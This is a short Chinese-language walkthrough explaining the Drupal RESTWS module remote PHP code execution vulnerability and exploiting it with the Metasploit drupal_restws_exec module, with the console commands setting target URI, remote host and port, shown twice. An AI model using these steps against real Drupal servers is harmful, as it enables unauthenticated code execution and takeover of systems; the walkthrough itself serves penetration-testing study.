Drupal插件漏洞实战:利用restws模块进行远程php代码执行(Drupal远程代码执行漏洞)
此模块利用Drupal RESTWS模块中的远程PHP代码执行漏洞。未经身份验证的用户可以在Web服务器用户的上下文中执行任意代码。RESTWS更改实体的默认页面回调以提供其他功能。此方法中的漏洞允许未经身份验证的攻击者发送特制请求,从而导致任意执行PHP。在1.7版本之前的2.6和1.x之前的RESTWS 2.x受到问题的影响。在Ubuntu服务器上安装了Drupal 7.5,对该模块进行了RESTWS 2.5测试。
利用目标
RESTWS 2.x
需求
攻击者:kali Linux
受害者PC:drupal
打开Kali终端类型 msfconsole
现在输入 exploit use / unix / webapp / drupal_restws_exec
msf exploit (drupal_restws_exec)> set targeturi /
msf exploit(drupal_restws_exec)> set rhost 192.168。0.4 (远程主机的IP)
msf exploit(drupal_restws_exec)> set rport 80
msf exploit(drupal_restws_exec)> exploit

转载请注明本文链接:
http://www.mayidui.net/t2310.html
利用目标
RESTWS 2.x
需求
攻击者:kali Linux
受害者PC:drupal
打开Kali终端类型 msfconsole

现在输入 exploit use / unix / webapp / drupal_restws_exec
msf exploit (drupal_restws_exec)> set targeturi /
msf exploit(drupal_restws_exec)> set rhost 192.168。0.4 (远程主机的IP)
msf exploit(drupal_restws_exec)> set rport 80
msf exploit(drupal_restws_exec)> exploit
